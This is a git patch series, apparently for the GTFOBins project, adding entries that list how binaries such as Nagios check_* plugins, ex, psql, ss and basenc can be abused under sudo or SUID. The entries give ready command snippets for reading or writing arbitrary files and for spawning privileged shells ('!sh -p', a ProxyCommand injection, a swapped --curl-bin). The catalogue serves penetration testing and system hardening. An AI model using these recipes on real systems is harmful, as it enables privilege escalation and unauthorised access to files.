From 127738e9276a8a434bd46a8bde67b01e0fa27d62 Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Thu, 12 Nov 2020 14:21:00 +0100 Subject: [PATCH 01/43] New command: check_by_ssh --- _gtfobins/check_by_ssh.md | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 _gtfobins/check_by_ssh.md diff --git a/_gtfobins/check_by_ssh.md b/_gtfobins/check_by_ssh.md new file mode 100644 index 0000000..dedf47b --- /dev/null +++ b/_gtfobins/check_by_ssh.md @@ -0,0 +1,29 @@ +--- +description: | + This is the `check_by_ssh` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`. +functions: + command: + - code: | + COMMAND='/usr/bin/id' + OUTPUT="output_file" + TF=$(mktemp) + echo "ProxyCommand \"$COMMAND\" | tee \"$OUTPUT\"" > $TF + check_by_ssh -F "$TF" -H localhost -C something + cat $OUTPUT + suid: + - code: | + COMMAND='/usr/bin/id' + OUTPUT="output_file" + TF=$(mktemp) + echo "ProxyCommand \"$COMMAND\" | tee \"$OUTPUT\"" > $TF + check_by_ssh -F "$TF" -H localhost -C something + cat $OUTPUT + sudo: + - code: | + COMMAND='/usr/bin/id' + OUTPUT="output_file" + TF=$(mktemp) + echo "ProxyCommand \"$COMMAND\" | tee \"$OUTPUT\"" > $TF + check_by_ssh -F "$TF" -H localhost -C something + cat $OUTPUT +--- From 722f9bc605bf17a32dd92ff5733cb8630f56c01b Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Thu, 12 Nov 2020 14:21:00 +0100 Subject: [PATCH 02/43] New command: check_cups --- _gtfobins/check_cups.md | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) create mode 100644 _gtfobins/check_cups.md diff --git a/_gtfobins/check_cups.md b/_gtfobins/check_cups.md new file mode 100644 index 0000000..841ec51 --- /dev/null +++ b/_gtfobins/check_cups.md @@ -0,0 +1,17 @@ +--- +description: | + This is the `check_cups` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`. The read file content is limited to the first line. +functions: + file-read: + - code: | + LFILE=file_to_read + check_cups --extra-opts=@"$LFILE" + suid: + - code: | + LFILE=file_to_read + ./check_cups --extra-opts=@"$LFILE" + sudo: + - code: | + LFILE=file_to_read + sudo check_cups --extra-opts=@"$LFILE" +--- From ea9dd24d595eb543c74fb02d7c4d0a66ea736dfe Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Thu, 12 Nov 2020 14:21:00 +0100 Subject: [PATCH 03/43] New command: check_log --- _gtfobins/check_log.md | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 _gtfobins/check_log.md diff --git a/_gtfobins/check_log.md b/_gtfobins/check_log.md new file mode 100644 index 0000000..f869ad4 --- /dev/null +++ b/_gtfobins/check_log.md @@ -0,0 +1,30 @@ +--- +description: | + This is the `check_log` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`. +functions: + file-read: + - code: | + LFILE=file_to_read + OUTPUT=output_file + umask 022 + check_log -F "$LFILE" -O "$OUTPUT" + cat "$OUTPUT" + file-write: + - code: | + LFILE=file_to_write + INPUT=output_file + umask 022 + check_log -F "$INPUT" -O "$LFILE" + suid: + - code: | + LFILE=file_to_write + INPUT=output_file + umask 022 + ./check_log -F "$INPUT" -O "$LFILE" + sudo: + - code: | + LFILE=file_to_write + INPUT=output_file + umask 022 + sudo check_log -F "$INPUT" -O "$LFILE" +--- From d0bbdb69cf198ade10fb95d7790aa10815348bce Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Thu, 12 Nov 2020 14:21:00 +0100 Subject: [PATCH 04/43] New command: check_memory --- _gtfobins/check_memory.md | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) create mode 100644 _gtfobins/check_memory.md diff --git a/_gtfobins/check_memory.md b/_gtfobins/check_memory.md new file mode 100644 index 0000000..d04333a --- /dev/null +++ b/_gtfobins/check_memory.md @@ -0,0 +1,17 @@ +--- +description: | + This is the `check_memory` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`. The read file content is limited to the first line. +functions: + file-read: + - code: | + LFILE=file_to_read + check_memory --extra-opts=@"$LFILE" + suid: + - code: | + LFILE=file_to_read + ./check_memory --extra-opts=@"$LFILE" + sudo: + - code: | + LFILE=file_to_read + sudo check_memory --extra-opts=@"$LFILE" +--- From 846a6131213f28122558210e33b98b998dc069ff Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Thu, 12 Nov 2020 14:21:00 +0100 Subject: [PATCH 05/43] New command: check_raid --- _gtfobins/check_raid.md | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) create mode 100644 _gtfobins/check_raid.md diff --git a/_gtfobins/check_raid.md b/_gtfobins/check_raid.md new file mode 100644 index 0000000..2c7c775 --- /dev/null +++ b/_gtfobins/check_raid.md @@ -0,0 +1,17 @@ +--- +description: | + This is the `check_raid` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`. The read file content is limited to the first line. +functions: + file-read: + - code: | + LFILE=file_to_read + check_raid --extra-opts=@"$LFILE" + suid: + - code: | + LFILE=file_to_read + ./check_raid --extra-opts=@"$LFILE" + sudo: + - code: | + LFILE=file_to_read + sudo check_raid --extra-opts=@"$LFILE" +--- From e7c1b630ad39a9951b11f3471bf1b152bc236e38 Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Thu, 12 Nov 2020 14:21:00 +0100 Subject: [PATCH 06/43] New command: check_ssl_cert --- _gtfobins/check_ssl_cert.md | 34 ++++++++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 _gtfobins/check_ssl_cert.md diff --git a/_gtfobins/check_ssl_cert.md b/_gtfobins/check_ssl_cert.md new file mode 100644 index 0000000..6a2b4a3 --- /dev/null +++ b/_gtfobins/check_ssl_cert.md @@ -0,0 +1,34 @@ +--- +description: | + This is the `check_by_ssh` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`. +functions: + command: + - code: | + COMMAND='/usr/bin/id' + OUTPUT="output_file" + TF=$(mktemp) + echo "$COMMAND | tee \"$OUTPUT\"" > $TF + chmod +x $TF + check_ssl_cert --curl-bin "$TF" -H example.com # example.com must provide TLS + cat $OUTPUT + suid: + - code: | + COMMAND='/usr/bin/id' + OUTPUT="output_file" + umask 022 + TF=$(mktemp) + echo "$COMMAND | tee \"$OUTPUT\"" > $TF + chmod +x $TF + ./check_ssl_cert --curl-bin "$TF" -H example.com # example.com must provide TLS + cat $OUTPUT + sudo: + - code: | + COMMAND='/usr/bin/id' + OUTPUT="output_file" + umask 022 + TF=$(mktemp) + echo "$COMMAND | tee \"$OUTPUT\"" > $TF + chmod +x $TF + sudo check_ssl_cert --curl-bin "$TF" -H example.com # example.com must provide TLS + cat $OUTPUT +--- From 00902fc03515b1f4cff2351d71e4d865da008e56 Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Thu, 12 Nov 2020 14:21:00 +0100 Subject: [PATCH 07/43] New command: check_statusfile --- _gtfobins/check_statusfile.md | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) create mode 100644 _gtfobins/check_statusfile.md diff --git a/_gtfobins/check_statusfile.md b/_gtfobins/check_statusfile.md new file mode 100644 index 0000000..1812112 --- /dev/null +++ b/_gtfobins/check_statusfile.md @@ -0,0 +1,17 @@ +--- +description: | + This is the `check_statusfile` Nagios plugi plugin, available e.g. in `/usr/lib/nagios/plugins/`. The read file content is limited to the first line. +functions: + file-read: + - code: | + LFILE=file_to_read + check_statusfile "$LFILE" + suid: + - code: | + LFILE=file_to_read + ./check_statusfile "$LFILE" + sudo: + - code: | + LFILE=file_to_read + sudo check_statusfile "$LFILE" +--- From ff997ac1046cfc6af5056beb4e81489cb9293e39 Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Thu, 12 Nov 2020 14:21:00 +0100 Subject: [PATCH 08/43] New command: column --- _gtfobins/column.md | 15 +++++++++++++++ 1 file changed, 15 insertions(+) create mode 100644 _gtfobins/column.md diff --git a/_gtfobins/column.md b/_gtfobins/column.md new file mode 100644 index 0000000..078ec55 --- /dev/null +++ b/_gtfobins/column.md @@ -0,0 +1,15 @@ +--- +functions: + file-read: + - code: | + LFILE=file_to_read + column "$LFILE" + suid: + - code: | + LFILE=file_to_read + ./column "$LFILE" + sudo: + - code: | + LFILE=file_to_read + sudo column "$LFILE" +--- From 324e0e672aa35c37aa78767bc95200e3792a2145 Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Thu, 12 Nov 2020 14:21:00 +0100 Subject: [PATCH 09/43] New command: ex --- _gtfobins/ex.md | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 _gtfobins/ex.md diff --git a/_gtfobins/ex.md b/_gtfobins/ex.md new file mode 100644 index 0000000..8063c4e --- /dev/null +++ b/_gtfobins/ex.md @@ -0,0 +1,28 @@ +--- +functions: + shell: + - code: | + ex + !/bin/sh + file-write: + - code: | + ex file_to_write + a + DATA + . + w + q + file-read: + - code: | + ex file_to_read + ,p + q + sudo: + - code: | + sudo ex + !/bin/sh + limited-suid: + - code: | + ./ex + !/bin/sh +--- From 3d776d1ea85b40b51ce2df42103813d61c2f9211 Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Thu, 12 Nov 2020 14:21:00 +0100 Subject: [PATCH 10/43] New command: psql --- _gtfobins/psql.md | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 _gtfobins/psql.md diff --git a/_gtfobins/psql.md b/_gtfobins/psql.md new file mode 100644 index 0000000..f2a9b74 --- /dev/null +++ b/_gtfobins/psql.md @@ -0,0 +1,18 @@ +--- +functions: + shell: + - code: | + psql + \? + !/bin/sh + sudo: + - code: | + psql + \? + !/bin/sh + suid: + - code: | + psql + \? + !/bin/sh +--- From a8458733eae094af74c23d93f4373ede9a36ea5e Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Thu, 12 Nov 2020 14:21:00 +0100 Subject: [PATCH 11/43] New command: rev --- _gtfobins/rev.md | 15 +++++++++++++++ 1 file changed, 15 insertions(+) create mode 100644 _gtfobins/rev.md diff --git a/_gtfobins/rev.md b/_gtfobins/rev.md new file mode 100644 index 0000000..7fe91c3 --- /dev/null +++ b/_gtfobins/rev.md @@ -0,0 +1,15 @@ +--- +functions: + file-read: + - code: | + LFILE=file_to_read + rev "$LFILE" | rev + suid: + - code: | + LFILE=file_to_read + ./rev "$LFILE" | rev + sudo: + - code: | + LFILE=file_to_read + sudo rev "$LFILE" | rev +--- From bde35dc4c7ef86bd09fd3564ebe526b65d65dec8 Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Thu, 12 Nov 2020 14:21:00 +0100 Subject: [PATCH 12/43] New command: ss --- _gtfobins/ss.md | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) create mode 100644 _gtfobins/ss.md diff --git a/_gtfobins/ss.md b/_gtfobins/ss.md new file mode 100644 index 0000000..082acd4 --- /dev/null +++ b/_gtfobins/ss.md @@ -0,0 +1,17 @@ +--- +description: | + The read file content is limited to the first line and corrupted by an error message. +functions: + file-read: + - code: | + LFILE=file_to_read + ss -a -F "$LFILE" + suid: + - code: | + LFILE=file_to_read + ./ss -a -F "$LFILE" + sudo: + - code: | + LFILE=file_to_read + sudo ss -a -F "$LFILE" +--- From 0a110bb0448600badf97d59bb1517b01a6db2665 Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Thu, 12 Nov 2020 14:21:00 +0100 Subject: [PATCH 13/43] New command: ssh-keygen --- _gtfobins/ssh-keygen.md | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) create mode 100644 _gtfobins/ssh-keygen.md diff --git a/_gtfobins/ssh-keygen.md b/_gtfobins/ssh-keygen.md new file mode 100644 index 0000000..3f7f1d7 --- /dev/null +++ b/_gtfobins/ssh-keygen.md @@ -0,0 +1,17 @@ +--- +description: | + The read file content is corrupted by error prints. +functions: + file-read: + - code: | + LFILE=file_to_read + ssh-keyscan -f "$LFILE" + suid: + - code: | + LFILE=file_to_read + ./ssh-keyscan -f "$LFILE" + sudo: + - code: | + LFILE=file_to_read + sudo ssh-keyscan -f "$LFILE" +--- From 5a58f6a3c3557ee0c70d11acde91704408c1abec Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Thu, 12 Nov 2020 14:21:00 +0100 Subject: [PATCH 14/43] New command: tbl --- _gtfobins/tbl.md | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) create mode 100644 _gtfobins/tbl.md diff --git a/_gtfobins/tbl.md b/_gtfobins/tbl.md new file mode 100644 index 0000000..f78c5b8 --- /dev/null +++ b/_gtfobins/tbl.md @@ -0,0 +1,17 @@ +--- +description: | + The read file content is corrupted by additional text at the beginning. +functions: + file-read: + - code: | + LFILE=file_to_read + tbl "$LFILE" + suid: + - code: | + LFILE=file_to_read + ./tbl "$LFILE" + sudo: + - code: | + LFILE=file_to_read + sudo tbl "$LFILE" +--- From f9043b2f14f7e60dd24804e019e329757061c9cf Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Thu, 12 Nov 2020 14:21:00 +0100 Subject: [PATCH 15/43] New command: troff --- _gtfobins/troff.md | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) create mode 100644 _gtfobins/troff.md diff --git a/_gtfobins/troff.md b/_gtfobins/troff.md new file mode 100644 index 0000000..82f59c3 --- /dev/null +++ b/_gtfobins/troff.md @@ -0,0 +1,17 @@ +--- +description: | + The read file content is corrupted by error prints. +functions: + file-read: + - code: | + LFILE=file_to_read + troff "$LFILE" + suid: + - code: | + LFILE=file_to_read + ./troff "$LFILE" + sudo: + - code: | + LFILE=file_to_read + sudo troff "$LFILE" +--- From 66cc5dd5123eb05621950670b5b7c7475342447e Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Thu, 12 Nov 2020 14:21:00 +0100 Subject: [PATCH 16/43] New command: xmodmap --- _gtfobins/xmodmap.md | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) create mode 100644 _gtfobins/xmodmap.md diff --git a/_gtfobins/xmodmap.md b/_gtfobins/xmodmap.md new file mode 100644 index 0000000..8c32456 --- /dev/null +++ b/_gtfobins/xmodmap.md @@ -0,0 +1,17 @@ +--- +description: | + The read file content is corrupted by error prints. +functions: + file-read: + - code: | + LFILE=file_to_read + xmodmap -v "$LFILE" + suid: + - code: | + LFILE=file_to_read + ./xmodmap -v "$LFILE" + sudo: + - code: | + LFILE=file_to_read + sudo xmodmap -v "$LFILE" +--- From 64b4b9de1fbf749eceace8a95f3cfae215459f16 Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Thu, 12 Nov 2020 14:33:06 +0100 Subject: [PATCH 17/43] Fixed wrong filename --- _gtfobins/{ssh-keygen.md => ssh-keyscan.md} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename _gtfobins/{ssh-keygen.md => ssh-keyscan.md} (100%) diff --git a/_gtfobins/ssh-keygen.md b/_gtfobins/ssh-keyscan.md similarity index 100% rename from _gtfobins/ssh-keygen.md rename to _gtfobins/ssh-keyscan.md From bd1e3ce65da0f8ef227ba6e053f9bb7a7c908803 Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Thu, 12 Nov 2020 21:36:18 +0100 Subject: [PATCH 18/43] Fixed indentation --- _gtfobins/check_ssl_cert.md | 52 ++++++++++++++++++------------------- 1 file changed, 26 insertions(+), 26 deletions(-) diff --git a/_gtfobins/check_ssl_cert.md b/_gtfobins/check_ssl_cert.md index 6a2b4a3..2e5916d 100644 --- a/_gtfobins/check_ssl_cert.md +++ b/_gtfobins/check_ssl_cert.md @@ -3,32 +3,32 @@ description: | This is the `check_by_ssh` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`. functions: command: - - code: | - COMMAND='/usr/bin/id' - OUTPUT="output_file" - TF=$(mktemp) - echo "$COMMAND | tee \"$OUTPUT\"" > $TF - chmod +x $TF - check_ssl_cert --curl-bin "$TF" -H example.com # example.com must provide TLS - cat $OUTPUT + - code: | + COMMAND='/usr/bin/id' + OUTPUT="output_file" + TF=$(mktemp) + echo "$COMMAND | tee \"$OUTPUT\"" > $TF + chmod +x $TF + check_ssl_cert --curl-bin "$TF" -H example.com # example.com must provide TLS + cat $OUTPUT suid: - - code: | - COMMAND='/usr/bin/id' - OUTPUT="output_file" - umask 022 - TF=$(mktemp) - echo "$COMMAND | tee \"$OUTPUT\"" > $TF - chmod +x $TF - ./check_ssl_cert --curl-bin "$TF" -H example.com # example.com must provide TLS - cat $OUTPUT + - code: | + COMMAND='/usr/bin/id' + OUTPUT="output_file" + umask 022 + TF=$(mktemp) + echo "$COMMAND | tee \"$OUTPUT\"" > $TF + chmod +x $TF + ./check_ssl_cert --curl-bin "$TF" -H example.com # example.com must provide TLS + cat $OUTPUT sudo: - - code: | - COMMAND='/usr/bin/id' - OUTPUT="output_file" - umask 022 - TF=$(mktemp) - echo "$COMMAND | tee \"$OUTPUT\"" > $TF - chmod +x $TF - sudo check_ssl_cert --curl-bin "$TF" -H example.com # example.com must provide TLS - cat $OUTPUT + - code: | + COMMAND='/usr/bin/id' + OUTPUT="output_file" + umask 022 + TF=$(mktemp) + echo "$COMMAND | tee \"$OUTPUT\"" > $TF + chmod +x $TF + sudo check_ssl_cert --curl-bin "$TF" -H example.com # example.com must provide TLS + cat $OUTPUT --- From 764b2685bc05cf350b4f2ece0e6439d7eda6158e Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Fri, 13 Nov 2020 11:56:48 +0100 Subject: [PATCH 19/43] Syntax cleanup, removed some non-working SUID entries --- _gtfobins/check_by_ssh.md | 24 ++++++++---------------- _gtfobins/check_cups.md | 8 ++------ _gtfobins/check_log.md | 16 ++++------------ _gtfobins/check_memory.md | 8 ++------ _gtfobins/check_raid.md | 8 ++------ _gtfobins/check_ssl_cert.md | 34 +++++++++++++--------------------- _gtfobins/check_statusfile.md | 8 ++------ _gtfobins/column.md | 6 +++--- _gtfobins/ex.md | 8 ++++---- _gtfobins/psql.md | 14 +++++++------- _gtfobins/rev.md | 6 +++--- _gtfobins/ss.md | 6 +++--- _gtfobins/ssh-keyscan.md | 6 +++--- _gtfobins/tbl.md | 6 +++--- _gtfobins/troff.md | 6 +++--- _gtfobins/xmodmap.md | 6 +++--- 16 files changed, 65 insertions(+), 105 deletions(-) diff --git a/_gtfobins/check_by_ssh.md b/_gtfobins/check_by_ssh.md index dedf47b..e00730e 100644 --- a/_gtfobins/check_by_ssh.md +++ b/_gtfobins/check_by_ssh.md @@ -4,26 +4,18 @@ description: | functions: command: - code: | - COMMAND='/usr/bin/id' - OUTPUT="output_file" + COMMAND=id + OUTPUT=output_file TF=$(mktemp) - echo "ProxyCommand \"$COMMAND\" | tee \"$OUTPUT\"" > $TF - check_by_ssh -F "$TF" -H localhost -C something - cat $OUTPUT - suid: - - code: | - COMMAND='/usr/bin/id' - OUTPUT="output_file" - TF=$(mktemp) - echo "ProxyCommand \"$COMMAND\" | tee \"$OUTPUT\"" > $TF - check_by_ssh -F "$TF" -H localhost -C something + echo "ProxyCommand $COMMAND | tee $OUTPUT" > $TF + check_by_ssh -F $TF -H localhost -C something cat $OUTPUT sudo: - code: | - COMMAND='/usr/bin/id' - OUTPUT="output_file" + COMMAND=id + OUTPUT=output_file TF=$(mktemp) - echo "ProxyCommand \"$COMMAND\" | tee \"$OUTPUT\"" > $TF - check_by_ssh -F "$TF" -H localhost -C something + echo "ProxyCommand $COMMAND | tee $OUTPUT" > $TF + sudo check_by_ssh -F $TF -H localhost -C something cat $OUTPUT --- diff --git a/_gtfobins/check_cups.md b/_gtfobins/check_cups.md index 841ec51..225e2ae 100644 --- a/_gtfobins/check_cups.md +++ b/_gtfobins/check_cups.md @@ -5,13 +5,9 @@ functions: file-read: - code: | LFILE=file_to_read - check_cups --extra-opts=@"$LFILE" - suid: - - code: | - LFILE=file_to_read - ./check_cups --extra-opts=@"$LFILE" + check_cups --extra-opts=@$LFILE sudo: - code: | LFILE=file_to_read - sudo check_cups --extra-opts=@"$LFILE" + sudo check_cups --extra-opts=@$LFILE --- diff --git a/_gtfobins/check_log.md b/_gtfobins/check_log.md index f869ad4..023cdbd 100644 --- a/_gtfobins/check_log.md +++ b/_gtfobins/check_log.md @@ -6,25 +6,17 @@ functions: - code: | LFILE=file_to_read OUTPUT=output_file - umask 022 - check_log -F "$LFILE" -O "$OUTPUT" - cat "$OUTPUT" + check_log -F $LFILE -O $OUTPUT + cat $OUTPUT file-write: - code: | LFILE=file_to_write INPUT=output_file - umask 022 - check_log -F "$INPUT" -O "$LFILE" - suid: - - code: | - LFILE=file_to_write - INPUT=output_file - umask 022 - ./check_log -F "$INPUT" -O "$LFILE" + check_log -F $INPUT -O $LFILE sudo: - code: | LFILE=file_to_write INPUT=output_file umask 022 - sudo check_log -F "$INPUT" -O "$LFILE" + sudo check_log -F $INPUT -O $LFILE --- diff --git a/_gtfobins/check_memory.md b/_gtfobins/check_memory.md index d04333a..8ca90eb 100644 --- a/_gtfobins/check_memory.md +++ b/_gtfobins/check_memory.md @@ -5,13 +5,9 @@ functions: file-read: - code: | LFILE=file_to_read - check_memory --extra-opts=@"$LFILE" - suid: - - code: | - LFILE=file_to_read - ./check_memory --extra-opts=@"$LFILE" + check_memory --extra-opts=@$LFILE sudo: - code: | LFILE=file_to_read - sudo check_memory --extra-opts=@"$LFILE" + sudo check_memory --extra-opts=@$LFILE --- diff --git a/_gtfobins/check_raid.md b/_gtfobins/check_raid.md index 2c7c775..ef1e823 100644 --- a/_gtfobins/check_raid.md +++ b/_gtfobins/check_raid.md @@ -5,13 +5,9 @@ functions: file-read: - code: | LFILE=file_to_read - check_raid --extra-opts=@"$LFILE" - suid: - - code: | - LFILE=file_to_read - ./check_raid --extra-opts=@"$LFILE" + check_raid --extra-opts=@$LFILE sudo: - code: | LFILE=file_to_read - sudo check_raid --extra-opts=@"$LFILE" + sudo check_raid --extra-opts=@$LFILE --- diff --git a/_gtfobins/check_ssl_cert.md b/_gtfobins/check_ssl_cert.md index 2e5916d..2401373 100644 --- a/_gtfobins/check_ssl_cert.md +++ b/_gtfobins/check_ssl_cert.md @@ -3,32 +3,24 @@ description: | This is the `check_by_ssh` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`. functions: command: - - code: | - COMMAND='/usr/bin/id' - OUTPUT="output_file" + - description: The host example.net must return a certificate via TLS + code: | + COMMAND=id + OUTPUT=output_file TF=$(mktemp) - echo "$COMMAND | tee \"$OUTPUT\"" > $TF + echo "$COMMAND | tee $OUTPUT" > $TF chmod +x $TF - check_ssl_cert --curl-bin "$TF" -H example.com # example.com must provide TLS - cat $OUTPUT - suid: - - code: | - COMMAND='/usr/bin/id' - OUTPUT="output_file" - umask 022 - TF=$(mktemp) - echo "$COMMAND | tee \"$OUTPUT\"" > $TF - chmod +x $TF - ./check_ssl_cert --curl-bin "$TF" -H example.com # example.com must provide TLS + check_ssl_cert --curl-bin $TF -H example.net cat $OUTPUT sudo: - - code: | - COMMAND='/usr/bin/id' - OUTPUT="output_file" - umask 022 + - description: The host example.net must return a certificate via TLS + code: | + COMMAND=id + OUTPUT=output_file TF=$(mktemp) - echo "$COMMAND | tee \"$OUTPUT\"" > $TF + echo "$COMMAND | tee $OUTPUT" > $TF chmod +x $TF - sudo check_ssl_cert --curl-bin "$TF" -H example.com # example.com must provide TLS + umask 022 + check_ssl_cert --curl-bin $TF -H example.net cat $OUTPUT --- diff --git a/_gtfobins/check_statusfile.md b/_gtfobins/check_statusfile.md index 1812112..dbb297b 100644 --- a/_gtfobins/check_statusfile.md +++ b/_gtfobins/check_statusfile.md @@ -5,13 +5,9 @@ functions: file-read: - code: | LFILE=file_to_read - check_statusfile "$LFILE" - suid: - - code: | - LFILE=file_to_read - ./check_statusfile "$LFILE" + check_statusfile $LFILE sudo: - code: | LFILE=file_to_read - sudo check_statusfile "$LFILE" + sudo check_statusfile $LFILE --- diff --git a/_gtfobins/column.md b/_gtfobins/column.md index 078ec55..af67980 100644 --- a/_gtfobins/column.md +++ b/_gtfobins/column.md @@ -3,13 +3,13 @@ functions: file-read: - code: | LFILE=file_to_read - column "$LFILE" + column $LFILE suid: - code: | LFILE=file_to_read - ./column "$LFILE" + ./column $LFILE sudo: - code: | LFILE=file_to_read - sudo column "$LFILE" + sudo column $LFILE --- diff --git a/_gtfobins/ex.md b/_gtfobins/ex.md index 8063c4e..1029504 100644 --- a/_gtfobins/ex.md +++ b/_gtfobins/ex.md @@ -3,7 +3,7 @@ functions: shell: - code: | ex - !/bin/sh + !sh file-write: - code: | ex file_to_write @@ -20,9 +20,9 @@ functions: sudo: - code: | sudo ex - !/bin/sh - limited-suid: + !sh + suid: - code: | ./ex - !/bin/sh + !sh -p --- diff --git a/_gtfobins/psql.md b/_gtfobins/psql.md index f2a9b74..ae7b794 100644 --- a/_gtfobins/psql.md +++ b/_gtfobins/psql.md @@ -4,15 +4,15 @@ functions: - code: | psql \? - !/bin/sh - sudo: - - code: | - psql - \? - !/bin/sh + !sh suid: - code: | psql \? - !/bin/sh + !sh -p + sudo: + - code: | + psql + \? + !sh --- diff --git a/_gtfobins/rev.md b/_gtfobins/rev.md index 7fe91c3..4e27759 100644 --- a/_gtfobins/rev.md +++ b/_gtfobins/rev.md @@ -3,13 +3,13 @@ functions: file-read: - code: | LFILE=file_to_read - rev "$LFILE" | rev + rev $LFILE | rev suid: - code: | LFILE=file_to_read - ./rev "$LFILE" | rev + ./rev $LFILE | rev sudo: - code: | LFILE=file_to_read - sudo rev "$LFILE" | rev + sudo rev $LFILE | rev --- diff --git a/_gtfobins/ss.md b/_gtfobins/ss.md index 082acd4..28d4bce 100644 --- a/_gtfobins/ss.md +++ b/_gtfobins/ss.md @@ -5,13 +5,13 @@ functions: file-read: - code: | LFILE=file_to_read - ss -a -F "$LFILE" + ss -a -F $LFILE suid: - code: | LFILE=file_to_read - ./ss -a -F "$LFILE" + ./ss -a -F $LFILE sudo: - code: | LFILE=file_to_read - sudo ss -a -F "$LFILE" + sudo ss -a -F $LFILE --- diff --git a/_gtfobins/ssh-keyscan.md b/_gtfobins/ssh-keyscan.md index 3f7f1d7..e5bb84c 100644 --- a/_gtfobins/ssh-keyscan.md +++ b/_gtfobins/ssh-keyscan.md @@ -5,13 +5,13 @@ functions: file-read: - code: | LFILE=file_to_read - ssh-keyscan -f "$LFILE" + ssh-keyscan -f $LFILE suid: - code: | LFILE=file_to_read - ./ssh-keyscan -f "$LFILE" + ./ssh-keyscan -f $LFILE sudo: - code: | LFILE=file_to_read - sudo ssh-keyscan -f "$LFILE" + sudo ssh-keyscan -f $LFILE --- diff --git a/_gtfobins/tbl.md b/_gtfobins/tbl.md index f78c5b8..93ec6fa 100644 --- a/_gtfobins/tbl.md +++ b/_gtfobins/tbl.md @@ -5,13 +5,13 @@ functions: file-read: - code: | LFILE=file_to_read - tbl "$LFILE" + tbl $LFILE suid: - code: | LFILE=file_to_read - ./tbl "$LFILE" + ./tbl $LFILE sudo: - code: | LFILE=file_to_read - sudo tbl "$LFILE" + sudo tbl $LFILE --- diff --git a/_gtfobins/troff.md b/_gtfobins/troff.md index 82f59c3..52a2bdc 100644 --- a/_gtfobins/troff.md +++ b/_gtfobins/troff.md @@ -5,13 +5,13 @@ functions: file-read: - code: | LFILE=file_to_read - troff "$LFILE" + troff $LFILE suid: - code: | LFILE=file_to_read - ./troff "$LFILE" + ./troff $LFILE sudo: - code: | LFILE=file_to_read - sudo troff "$LFILE" + sudo troff $LFILE --- diff --git a/_gtfobins/xmodmap.md b/_gtfobins/xmodmap.md index 8c32456..8d23cb1 100644 --- a/_gtfobins/xmodmap.md +++ b/_gtfobins/xmodmap.md @@ -5,13 +5,13 @@ functions: file-read: - code: | LFILE=file_to_read - xmodmap -v "$LFILE" + xmodmap -v $LFILE suid: - code: | LFILE=file_to_read - ./xmodmap -v "$LFILE" + ./xmodmap -v $LFILE sudo: - code: | LFILE=file_to_read - sudo xmodmap -v "$LFILE" + sudo xmodmap -v $LFILE --- From f3dfd7a50cc5cf4e4cbb70f796abb54dc13bd718 Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Fri, 13 Nov 2020 11:57:13 +0100 Subject: [PATCH 20/43] Added nroff file read --- _gtfobins/nroff.md | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/_gtfobins/nroff.md b/_gtfobins/nroff.md index f7fb52c..38cc263 100644 --- a/_gtfobins/nroff.md +++ b/_gtfobins/nroff.md @@ -1,5 +1,10 @@ --- functions: + file-read: + - description: The read file content is corrupted by arbitrary newlines. + code: | + LFILE=file_to_read + nroff $LFILE shell: - code: | TF=$(mktemp -d) From 2ee9d7a93432cb95f09bd07cdfc3557bdc7d28a3 Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Fri, 13 Nov 2020 11:58:00 +0100 Subject: [PATCH 21/43] New command: basenc --- _gtfobins/basenc.md | 15 +++++++++++++++ 1 file changed, 15 insertions(+) create mode 100644 _gtfobins/basenc.md diff --git a/_gtfobins/basenc.md b/_gtfobins/basenc.md new file mode 100644 index 0000000..b8f2a59 --- /dev/null +++ b/_gtfobins/basenc.md @@ -0,0 +1,15 @@ +--- +functions: + file-read: + - code: | + LFILE=file_to_read + basenc --base16 $LFILE | basenc -d --base16 + suid: + - code: | + LFILE=file_to_read + basenc --base16 $LFILE | basenc -d --base16 + sudo: + - code: | + LFILE=file_to_read + sudo basenc --base16 $LFILE | basenc -d --base16 +--- From 55b7296d8ee0a0ea9c1eb3c850d18298b885ba2c Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Fri, 13 Nov 2020 11:59:14 +0100 Subject: [PATCH 22/43] New command: comm --- _gtfobins/comm.md | 